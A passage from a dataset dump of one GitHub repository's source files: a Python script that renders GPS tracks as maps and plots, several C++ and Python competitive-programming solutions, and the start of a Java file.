int(time.mktime(datetime.datetime.strptime(s, format).timetuple()))\n\n\ndef gpsToHtml(filename, yandex, output):\n rl = filename.readlines()\n coords = []\n if filename.name.endswith('.gpx'):\n parsed = xmltodict.parse(''.join(rl))['gpx']\n title = parsed['metadata']['name']\n lines = parsed['trk']\n if not 'trkseg' in lines:\n return\n else:\n lines = lines['trkseg']\n if type(lines) != list: lines = [lines]\n for segment in lines:\n ps = segment['trkpt']\n if type(ps) != list: ps = [ps]\n for line in ps:\n t = getTimeFromString(line['time'][:-1] + '000', '%Y-%m-%dT%H:%M:%S.%f')\n coords.append([t, line['@lat'], line['@lon'], float(line.get('extensions', {'geotracker:meta': {}}).get('geotracker:meta').get('@s', 0)) * 3.6, line['ele']])\n start = coords[0][0]\n else:\n start = rl[0].split('/')[3][:-4]\n start = getTimeFromString(start, '%Y%m%d%H%M%S')\n title = datetime.datetime.fromtimestamp(start).strftime('%Y-%m-%d %H:%M:%S')\n lines = list(map(lambda line: line[:-1].split(','), filter(lambda line: line.startswith('$GPRMC'), rl)))\n for line in lines:\n t = line[9][:4] + '20' + line[9][4:] + line[1].split('.')[0]\n t = getTimeFromString(t, '%d%m%Y%H%M%S') + int(line[1][7:]) / 1000\n coords.append([t, degsToDegs(line[3]), degsToDegs(line[5]), float(line[7]) * 1.852])\n\n points = []\n speeds = []\n commands = []\n hs = []\n last = 0\n lastTime = start\n for t, x, y, s, *h in coords:\n if h: hs.append(int(h[0]))\n points.append([str(x)[:9], str(y)[:9]])\n speeds.append(int(s))\n shift = 2\n commands.append(f\"drawtext=text='{int(last)} km/h':enable='between(t,{max(0, lastTime - start - shift):.2f},{max(0, t - start - shift):.2f})':x=10:y=H-th-10:fontsize=40:fontcolor=red\")\n last = s\n lastTime = t\n\n points = ', '.join(map(lambda x: '[' + ', '.join(x) + ']', points))\n if points:\n output.write(''.join(yandex).replace('POINTS', points).replace('TITLE', title))\n output.close()\n else:\n os.unlink(output.name)\n filename.close()\n print(', \\\\\\n'.join(commands))\n\n title = output.name.rsplit('/', 1)[-1]\n import matplotlib.pyplot as plt\n\n fig, ax1 = plt.subplots()\n\n color = 'tab:blue'\n ax1.plot(speeds, color = color)\n ax1.set_title(title)\n ax1.set_xlabel('Dist')\n ax1.set_ylabel('Speed', color = color)\n ax1.tick_params(axis = 'y', labelcolor = color)\n\n if hs:\n color = 'tab:red'\n ax2 = ax1.twinx()\n ax2.plot(hs, color = color)\n ax2.set_ylabel('Height', color = color)\n ax2.tick_params(axis = 'y', labelcolor = color)\n\n fig.tight_layout()\n plt.savefig(output.name.replace(r'\\s', '') + '.png', dpi=900);\n plt.show()\n\n\[email protected]()\[email protected]('filename', required=True, type=click.File('r'), nargs=1)\[email protected]('-y', '--yandex', help='index', type=click.File('r'), default='./yandexMap/index.html')\ndef getMap(filename, yandex):\n gpsToHtml(filename, yandex.readlines(), open(filename.name.rsplit('.', 1)[0] + '.html', 'w'))\n\[email protected]()\[email protected]('dir', required=True, type=click.Path(file_okay=False), nargs=1)\[email protected]('-y', '--yandex', help='index', type=click.File('r'), default='./yandexMap/index.html')\ndef getMaps(dir, yandex):\n html = yandex.readlines()\n for f in listdir(dir):\n filename = join(dir, f)\n if isfile(filename) and (filename.endswith('.LOG') or filename.endswith('.gpx')):\n gpsToHtml(open(filename, 'r'), html, open(filename.rsplit('.', 1)[0] + '.html', 'w'))\n yandex.close()\n\nif __name__ == \"__main__\":\n completion()\n" }, { "alpha_fraction": 0.39518633484840393, "alphanum_fraction": 0.41149067878723145, "avg_line_length": 18.223880767822266, "blob_id": "60c3d25c8b83591cefa841e82fe21d47ab91b327", "content_id": "019a0135f1a0fe0b38a1ed1151ad9f6b6f0a0571", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1288, "license_type": "no_license", "max_line_length": 53, "num_lines": 67, "path": "/trash/typycal_proger/F.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stack>\n#include <vector>\n#include <stdio.h>\n#include <queue>\n\nusing namespace std;\n\nvector< vector<int> > edges;\nvector<int> d;\nvector<bool> used;\nint n, m, k;\n\nbool dfs(int v)\n{\n if (used[v])\n return false;\n used[v] = true;\n for (int i = 0; i < edges[v].size(); i++)\n {\n int u = edges[v][i];\n if (d[u] == -1 || dfs(d[u]))\n {\n d[u] = v;\n return true;\n }\n }\n return false;\n}\n\nint main()\n{\n //freopen(\"input.txt\", \"r\", stdin);\n //freopen(\"output.out\", \"w+\", stdout);\n scanf(\"%d\\n\", &n);\n edges.resize(n + 1);\n int x, y = 1;\n char s[5001][101];\n char g;\n for (int i = 0; i < n; i++)\n {\n scanf(\"%s\\n\", &s[i + 1]);\n while (true)\n {\n scanf(\"%d%c\", &y, &g);\n edges[i + 1].push_back(y);\n if (g == '\\n')\n break;\n }\n }\n d.resize(n + 1, -1);\n int c = 0;\n for (int i = 1; i <= n; i++)\n {\n used.clear();\n used.resize(n + 1, false);\n if (dfs(i))\n c++;\n }\n for (int i = 1; i <= n; i++)\n printf(\"%s%c\", s[d[i]], i == n ? '\\n' : ' ');\n// printf(\"%d\", c);\n fclose(stdin);\n fclose(stdout);\n return 0;\n}\n" }, { "alpha_fraction": 0.4669749140739441, "alphanum_fraction": 0.4995596706867218, "avg_line_length": 28.88157844543457, "blob_id": "f2e4345bb73b22cf8f4ee6f34e4437768143a359", "content_id": "57fb72054c7552d0fc68774376a8b03326975da8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4542, "license_type": "no_license", "max_line_length": 174, "num_lines": 152, "path": "/CodeForce/1746/E1.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n#ifdef ONLINE_JUDGE\n#pragma GCC target(\"avx2,bmi,bmi2,lzcnt,popcnt\")\n#endif\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//}}}\n\nvoid run()\n{\n ints(n);\n vi a(n);\n iota(all(a), 1);\n\n auto ask = [&](vector<int>& x) {\n writeln(\"?\", x.size(), x);\n string s;\n readln(s);\n return s == \"YES\";\n };\n\n vector<int> x[4], nxt;\n\n auto makeNext = [&](int i, int j = -1, int k = -1) {\n nxt.clear();\n copy(all(x[i]), back_inserter(nxt));\n if (j != -1)\n copy(all(x[j]), back_inserter(nxt));\n if (k != -1)\n copy(all(x[k]), back_inserter(nxt));\n };\n\n auto dump = [&]() {\n fori(4) x[i].clear();\n };\n\n while (a.size() > 3)\n {\n dump();\n int q = a.size() / 4;\n int m1 = q;\n int m2 = q * 2;\n int m3 = q * 3;\n\n copy(a.begin(), a.begin() + m1, back_inserter(x[0]));\n copy(a.begin() + m1, a.begin() + m2, back_inserter(x[1]));\n copy(a.begin() + m2, a.begin() + m3, back_inserter(x[2]));\n copy(a.begin() + m3, a.end(), back_inserter(x[3]));\n makeNext(0, 1);\n int a0 = ask(nxt);\n makeNext(0, 2);\n int a1 = ask(nxt);\n if (a0 && a1)\n makeNext(0, 1, 2);\n else if (!a0 && !a1)\n makeNext(1, 2, 3);\n else if (a0 && !a1)\n makeNext(0, 1, 3);\n else\n makeNext(0, 2, 3);\n a = nxt;\n }\n \n if (a.size() == 3)\n {\n dump();\n int m1 = a.size() / 3;\n int m2 = a.size() - m1;\n copy(a.begin(), a.begin() + m1, back_inserter(x[0]));\n copy(a.begin() + m1, a.begin() + m2, back_inserter(x[1]));\n copy(a.begin() + m2, a.end(), back_inserter(x[2]));\n bool a0 = ask(x[0]);\n bool a1 = ask(x[1]);\n bool a2 = ask(x[1]);\n bool a3 = ask(x[0]);\n\n if (a1 == a2)\n {\n if (a1)\n makeNext(1);\n else\n makeNext(0, 2);\n }\n else if ((a0 && a1) || (a2 && a3))\n {\n makeNext(0, 1);\n }\n else if ((a0 && !a1) || (!a2 && a3))\n makeNext(0, 2);\n else\n makeNext(1, 2);\n a = nxt;\n }\n writeln(\"!\", a[0]);\n string s; readln(s);\n if (s == \":(\")\n {\n writeln(\"!\", a[1]);\n readln(s);\n }\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.4813039302825928, "alphanum_fraction": 0.49185043573379517, "avg_line_length": 30.606060028076172, "blob_id": "f1d591fc82f7fbbc798c43a2715ec99cae9d0008", "content_id": "71347a52d46be4a51f5b7921d51e24da110d10d4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2086, "license_type": "no_license", "max_line_length": 928, "num_lines": 66, "path": "/trains/neerc/neerc.ifmo.ru.train.2013.09.17/G.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#include <queue>\n#define ll long long\n#define enter printf(\"\\n\");\n#define pb push_back\n\nusing namespace std;\nint INF = 1000000007;\nstring FILENAME = \"diophantus\";\nstring FILEINPUT = FILENAME;\n\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\n\nvoid readln(vector<int> &f, int n)\n{\n int x;\n for (int i = 1; i <= n; i++)\n {\n read(x);\n f.push_back(x);\n }\n}\n\nvoid writeln(vector<int> &f)\n{\n for (int i = 0; i < f.size(); i++)\n printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');\n}\n\nvoid run()\n{\n int n;\n readln(n);\n ll N = (ll) n;\n N *= N;\n int k = 2;\n for (ll i = 1; i <= n; i++)\n if (N % i == 0)\n {\n k += 2;\n if (i * i == N)\n k--;\n }\n printf(\"%d\", k / 2);\n}\n\nint main()\n{\n freopen(FILEINPUT.append(\".in\").c_str(), \"r\", stdin);\n freopen(FILENAME.append(\".out\").c_str(), \"w\", stdout);\n int T;\n readln(T);\n for (int TT = 0; TT < T; TT++)\n {\n printf(\"Scenario #%d:\\n\", TT + 1);\n run();\n if (TT < T - 1)\n printf(\"\\n\\n\");\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.5491928458213806, "alphanum_fraction": 0.568224310874939, "avg_line_length": 31.877094268798828, "blob_id": "c086c2402b3e7eb2d1f2f6cd0d1fd61e30752231", "content_id": "c5a6c2375e011e150a040ea5a52bf58d9a08b9df", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5885, "license_type": "no_license", "max_line_length": 203, "num_lines": 179, "path": "/CodeForce/0490/D.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "//template igorjan94 version from 17 November 2014\n#include <bits/stdc++.h>\n\n#define pb push_back\n#define ll long long\n#define forit(it, r) for (auto it = r.begin(); it != r.end(); it++)\n#define forn(i, n) for (int i = 0; i < n; ++i)\n#define forn1(i, n) for (int i = 1; i < n; ++i)\n#define FOR(i, m, n) for (int i = m; i < n; ++i)\n#define ROF(i, m, n) for (int i = m; i >= n; --i)\n#define fori(n) for (int i = 0; i < n; ++i)\n#define forj(n) for (int j = 0; j < n; ++j)\n#define fori1(n) for (int i = 1; i < n; ++i)\n#define forj1(n) for (int j = 1; j < n; ++j)\n#define vi vector<int>\n#define vvi vector<vector<int> >\n#define vll vector<long long>\n#define pii pair<int, int>\n#define whole(a) a.begin(), a.end()\n#define fst first\n#define cnd second\n\n#ifndef ONLINE_JUDGE\n#define lld I64d\n#endif\n\n#define FILENAME \"input\"\n#define INF 1000000007\n#define DOUBLEFORMAT \"%f\"\n\nusing namespace std;\n\ntemplate <class Head, class... Tail> inline void writeln(Head head, Tail... tail);\ntemplate <class Head, class... Tail> inline void writeln2(Head head, Tail... tail);\ntemplate <class Head, class... Tail> inline void readln(Head& head, Tail&... tail);\ntemplate <class Head, class... Tail> inline void read(Head& head, Tail&... tail);\ntemplate <class Head, class... Tail> inline void print(Head& head, Tail&... tail);\ntemplate <class Type1, class Type2> inline void print(pair<Type1, Type2>& p);\ntemplate <class Type1, class Type2> inline void print_no_space(pair<Type1, Type2>& p);\ntemplate <class Head, class... Tail> inline void print_no_space(Head& head, Tail&... tail);\nvoid inline writeln(){printf(\"\\n\");}void inline writeln2(){printf(\"\\n\");}void inline readln(){}\n\n///----------------------------------------------------------------------------------------------------------------------------\nmap<ll, pair<pair<ll, ll>, int> > can;\nmap<int, vector<pair<ll, ll>>> ans;\n\nvoid s(ll x, ll a, ll b, int d)\n{\n while (x % 2 == 0)\n {\n x /= 2;\n a % 2 == 0 ? a /= 2 : b /= 2;\n ++d;\n if (can.find(x) == can.end() || can[x].second > d)\n can[x] = {{a, b}, d};\n }\n}\n\nvoid t(ll x, ll a, ll b, int d)\n{\n if (can.find(x) != can.end())\n ans[d + can[x].second] = {can[x].first, {a, b}};\n while (x % 2 == 0)\n {\n d++;\n x /= 2;\n a % 2 == 0 ? a /= 2 : b /= 2;\n if (can.find(x) != can.end())\n ans[d + can[x].second] = {can[x].first, {a, b}};\n }\n}\n\nvoid run()\n{\n ll a, b, c, d;\n readln(a, b, c, d);\n ll x = a * b,\n y = c * d;\n int depth = 0;\n can[x] = {{a, b}, depth};\n s(x, a, b, depth);\n while (x % 3 == 0)\n {\n x = x / 3 * 2;\n a % 3 == 0 ? a = a / 3 * 2 : b = b / 3 * 2;\n can[x] = {{a, b}, ++depth};\n s(x, a, b, depth);\n }\n depth = 0;\n t(y, c, d, depth);\n while (y % 3 == 0)\n {\n y = y / 3 * 2;\n c % 3 == 0 ? c = c / 3 * 2 : d = d / 3 * 2;\n t(y, c, d, ++depth);\n }\n if (ans.size() == 0)\n {\n writeln(-1);\n return;\n }\n int i = -1;\n while (i++ >= -1)\n if (ans.find(i) != ans.end())\n {\n writeln(i);\n writeln(ans[i]);\n return;\n }\n}\n\nint main()\n{\n// freopen(FILENAME\".in\", \"r\", stdin);\n// freopen(FILENAME\".out\", \"w\", stdout);\n run();\n return 0;\n}\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\ninline void print(double a){printf(\" \" DOUBLEFORMAT,a);}\ninline void print(int a){printf(\" %d\",a);}\ninline void print(const char* a){printf(\" %s\",a);}\ninline void print(string a){printf(\" %s\",a.c_str());}\ninline void print(long long a){printf(\" %lld\",a);}\ninline void print(unsigned long a){printf(\" %ld\",a);}\ninline void print(unsigned int a){printf(\" %d\",a);}\ninline void print(char a){printf(\" %c\",a);}\ninline void print_no_space(double a){printf(DOUBLEFORMAT, a);}\ninline void print_no_space(int a){printf(\"%d\", a);}\ninline void print_no_space(const char* a){printf(\"%s\", a);}\ninline void print_no_space(string a){printf(\"%s\", a.c_str());}\ninline void print_no_space(long long a){printf(\"%lld\", a);}\ninline void print_no_space(unsigned long a){printf(\"%ld\", a);}\ninline void print_no_space(unsigned int a){printf(\"%d\", a);}\ninline void print_no_space(char a){printf(\"%c\", a);}\n\ntemplate<class Type> inline void print(vector<Type>& a){for(int i=0;i<a.size();++i)print(a[i]);}\ntemplate<class Type> inline void print(vector<vector<Type> >& a){if(a.size())(a.size()==1)?print(a[0]):writeln2(a[0]);for(int i=1;i<a.size()-1;++i)writeln2(a[i]);if(a.size()>=2)print_no_space(a.back());}\ntemplate<class Type> inline void print_no_space(vector<Type>& a){if(a.size())print_no_space(a[0]);for(int i=1;i<a.size();++i)print(a[i]);}\ntemplate<class Type> inline void print_no_space(vector<vector<Type> >&a){for(int i=0;i<a.size()-1;++i)writeln(a[i]);if(a.size())print_no_space(a.back());}\n\ntemplate<class Type1, class Type2> inline void print_no_space(pair<Type1, Type2>&a){print_no_space(a.first); writeln2(a.second);}\ntemplate<class Type1, class Type2> inline void print(pair<Type1, Type2>& a) {print_no_space(a.first); writeln2(a.second);}\n\ntemplate <class Head, class... Tail> inline void writeln2(Head head, Tail... tail){print(head);writeln2(tail...);}\ntemplate <class Head, class... Tail> inline void writeln(Head head, Tail... tail){print_no_space(head);writeln2(tail...);}\n\ninline void read(double &a){scanf(\"%lf\",&a);}\ninline void read(int &a){scanf(\"%d\",&a);}\ninline void read(string &a){cin>>a;}\ninline void read(long long &a){scanf(\"%lld\",&a);}\ninline void read(char &a){scanf(\"%c\",&a);}\ntemplate<class Type1, class Type2> inline void read(pair<Type1, Type2>&a){readln(a.first, a.second);}\ntemplate<class Type> inline void read(vector<Type> &a){if(a.size()==0){int n;read(n);a.resize(n);}for(int i=0;i<a.size();++i)readln(a[i]);}\ntemplate <class Head,class... Tail> inline void readln(Head& head,Tail&... tail){read(head);readln(tail...);}\n" }, { "alpha_fraction": 0.4410480260848999, "alphanum_fraction": 0.47541293501853943, "avg_line_length": 25.334999084472656, "blob_id": "406b4b3d7a29e662e77a47cf55328141a8170b55", "content_id": "eaba40e0ccadf835f024d7909c86b9f3373d6684", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5333, "license_type": "no_license", "max_line_length": 928, "num_lines": 200, "path": "/CodeForce/0396/D.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n\n#define enter printf(\"\\n\")\n#define pb push_back\n#define ll long long\n#define fors(it, r) for (set<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forvit(it, r) for (vector<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forv(i, vector) for (int i = 0; i < vector.size(); i++)\n#define forn(i, n) for (int i = 0; i < n; i++)\n#define forn1(i, n) for (int i = 1; i < n; i++)\n#define fori(n) for (int i = 0; i < n; i++)\n#define forj(n) for (int j = 0; j < n; j++)\n#define vi vector<int>\n#define vll vector<long long>\n#define pii pair<int, int>\n\nusing namespace std;\nint INF = 1000000007;\nstring FILENAME = \"input\";\nstring FILEINPUT = FILENAME;\n\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\nvoid readln(vector<int> &f, int n){int x;for (int i = 1; i <= n; i++){read(x);f.push_back(x);}}void writeln(vector<int> &f){for (int i = 0; i < f.size(); i++)printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');}\n\nint n, m, k;\n\nconst int trivial_limit = 50;\nint p[1000];\n\nll gcd (ll a, ll b) {\n\treturn a ? gcd (b%a, a) : b;\n}\n\nll powmod (ll a, ll b, ll m) {\n\tll res = 1;\n\twhile (b)\n\t\tif (b & 1)\n\t\t\tres = (res * 1ll * a) % m, --b;\n\t\telse\n\t\t\ta = (a * 1ll * a) % m, b >>= 1;\n\treturn res;\n}\n\nbool miller_rabin (ll n) {\n\tll b = 2;\n\tfor (ll g; (g = gcd (n, b)) != 1; ++b)\n\t\tif (n > g)\n\t\t\treturn false;\n\tll p=0, q=n-1;\n\twhile ((q & 1) == 0)\n\t\t++p, q >>= 1;\n\tll rem = powmod (b, q, n);\n\tif (rem == 1 || rem == n-1)\n\t\treturn true;\n\tfor (ll i=1; i<p; ++i) {\n\t\trem = (rem * 1ll * rem) % n;\n\t\tif (rem == n-1) return true;\n\t}\n\treturn false;\n}\n\nll jacobi (ll a, ll b)\n{\n\tif (a == 0) return 0;\n\tif (a == 1) return 1;\n\tif (a < 0)\n\t\tif ((b & 2) == 0)\n\t\t\treturn jacobi (-a, b);\n\t\telse\n\t\t\treturn - jacobi (-a, b);\n\tll a1=a, e=0;\n\twhile ((a1 & 1) == 0)\n\t\ta1 >>= 1, ++e;\n\tll s;\n\tif ((e & 1) == 0 || (b & 7) == 1 || (b & 7) == 7)\n\t\ts = 1;\n\telse\n\t\ts = -1;\n\tif ((b & 3) == 3 && (a1 & 3) == 3)\n\t\ts = -s;\n\tif (a1 == 1)\n\t\treturn s;\n\treturn s * jacobi (b % a1, a1);\n}\n\nbool bpsw (ll n) {\n\tif ((ll)sqrt(n+0.0) * (ll)sqrt(n+0.0) == n) return false;\n\tll dd=5;\n\tfor (;;) {\n\t\tll g = gcd (n, abs(dd));\n\t\tif (1<g && g<n) return false;\n\t\tif (jacobi (dd, n) == -1) break;\n\t\tdd = dd<0 ? -dd+2 : -dd-2;\n\t}\n\tll p=1, q=(p*p-dd)/4;\n\tll d=n+1, s=0;\n\twhile ((d & 1) == 0)\n\t\t++s, d>>=1;\n\tlong long u=1, v=p, u2m=1, v2m=p, qm=q, qm2=q*2, qkd=q;\n\tfor (ll mask=2; mask<=d; mask<<=1) {\n\t\tu2m = (u2m * v2m) % n;\n\t\tv2m = (v2m * v2m) % n;\n\t\twhile (v2m < qm2) v2m += n;\n\t\tv2m -= qm2;\n\t\tqm = (qm * qm) % n;\n\t\tqm2 = qm * 2;\n\t\tif (d & mask) {\n\t\t\tlong long t1 = (u2m * v) % n, t2 = (v2m * u) % n,\n\t\t\t\tt3 = (v2m * v) % n, t4 = (((u2m * u) % n) * dd) % n;\n\t\t\tu = t1 + t2;\n\t\t\tif (u & 1) u += n;\n\t\t\tu = (u >> 1) % n;\n\t\t\tv = t3 + t4;\n\t\t\tif (v & 1) v += n;\n\t\t\tv = (v >> 1) % n;\n\t\t\tqkd = (qkd * qm) % n;\n\t\t}\n\t}\n\tif (u==0 || v==0) return true;\n\tlong long qkd2 = qkd*2;\n\tfor (ll r=1; r<s; ++r) {\n\t\tv = (v * v) % n - qkd2;\n\t\tif (v < 0) v += n;\n\t\tif (v < 0) v += n;\n\t\tif (v >= n) v -= n;\n\t\tif (v >= n) v -= n;\n\t\tif (v == 0) return true;\n\t\tif (r < s-1) {\n\t\t\tqkd = (qkd * 1ll * qkd) % n;\n\t\t\tqkd2 = qkd * 2;\n\t\t}\n\t}\n\treturn false;\n}\n\nbool prime (ll n) { // эту функцию нужно вызывать для проверки на простоту\n\tfor (int i=0; i<trivial_limit && p[i]<n; ++i)\n\t\tif (n % p[i] == 0)\n\t\t\treturn false;\n\tif (p[trivial_limit-1]*p[trivial_limit-1] >= n)\n\t\treturn true;\n\tif (!miller_rabin (n))\n\t\treturn false;\n\treturn bpsw (n);\n}\n\nvoid prime_init() { // вызвать до первого вызова prime() !\n\tfor (int i=2, j=0; j<trivial_limit; ++i) {\n\t\tbool pr = true;\n\t\tfor (int k=2; k*k<=i; ++k)\n\t\t\tif (i % k == 0)\n\t\t\t\tpr = false;\n\t\tif (pr)\n\t\t\tp[j++] = i;\n\t}\n}\n\nvoid run()\n{\n ll n;\n int T;\n cin >> T;\n prime_init();\n forn(qqqq, T)\n {\n cin >> n;\n\n ll pmax = n, pmax1 = n + 1;\n while (!prime(pmax))\n pmax--;\n while (!prime(pmax1))\n pmax1++;\n ll ans1 = (pmax - 2) * pmax1 + (n - pmax + 1) * 2;\n ll ans2 = 2 * pmax * pmax1;\n if (ans1 % 2 == 0)\n {\n ans1 /= 2;\n ans2 /= 2;\n }\n if (ans1 % pmax == 0)\n {\n ans1 /= pmax;\n ans2 /= pmax;\n }\n if (ans1 % pmax1 == 0)\n {\n ans1 /= pmax1;\n ans2 /= pmax1;\n }\n cout << ans1 << \"/\" << ans2 << endl;\n }\n}\n\nint main()\n{\n //freopen(FILEINPUT.append(\".in\").c_str(), \"r\", stdin);\n //freopen(FILENAME.append(\".out\").c_str(), \"w\", stdout);\n run();\n return 0;\n}\n" }, { "alpha_fraction": 0.4354838728904724, "alphanum_fraction": 0.5483871102333069, "avg_line_length": 61, "blob_id": "4e96eb0e035826fa05df798804f0f56f25ddfbf6", "content_id": "7cf13cc36bd61d45d1ddc2d1c179cf1160a0d33f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 62, "license_type": "no_license", "max_line_length": 61, "num_lines": 1, "path": "/CodeForce/0535/B.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "print(int('1'+input().replace('4','0').replace('7','1'),2)-1)\n" }, { "alpha_fraction": 0.3833865821361542, "alphanum_fraction": 0.42172524333000183, "avg_line_length": 24.040000915527344, "blob_id": "fd303c7c8ebc715ec7c0344cf124eccab6a3f6d6", "content_id": "7091997fb5e2907765192ec9de2b2d72f2498e70", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 626, "license_type": "no_license", "max_line_length": 108, "num_lines": 25, "path": "/trains/neerc/neerc.ifmo.ru.train.2015.09.09/B.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import re\nimport sys\n\nf = open(\"input.txt\", \"r\")\nw = open(\"output.txt\", \"w\")\ns = f.readline()[:-1]\n\nans = 1234123412341234\nif re.sub(r\"[<>\\\"\\'&]\", \"\", s) == s:\n w.write(\"-1\")\nelse:\n if re.sub(r\"[<>\\\"\\']\", \"\", s) != s:\n w.write(\"0\")\n else:\n s = s.split('&')[1:]\n for t in s:\n temp = 0\n while t.startswith('amp;'):\n t = t[t.find(';') + 1:]\n temp += 1\n if t.startswith('gt;') or t.startswith('lt;') or t.startswith('apos;') or t.startswith('quot;'):\n temp += 1\n ans = min(ans, temp)\n\n w.write(str(ans))\n" }, { "alpha_fraction": 0.5775970816612244, "alphanum_fraction": 0.5813767313957214, "avg_line_length": 20.297561645507812, "blob_id": "00d43172065b9cda09919771a18ef77d0dc63f5c", "content_id": "d036275317fb388eb4c0f3fdd083f5afd88e39f1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 8731, "license_type": "no_license", "max_line_length": 100, "num_lines": 410, "path": "/trash/tpproger/tpG.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.io.ByteArrayInputStream;\nimport java.io.IOException;\nimport java.io.InputStream;\nimport java.io.UnsupportedEncodingException;\nimport java.text.ParseException;\nimport java.util.Arrays;\nimport java.util.List;\nimport java.util.Scanner;\n\npublic class tpG {\n\n\tpublic static void main(String[] argv) throws ParseException, 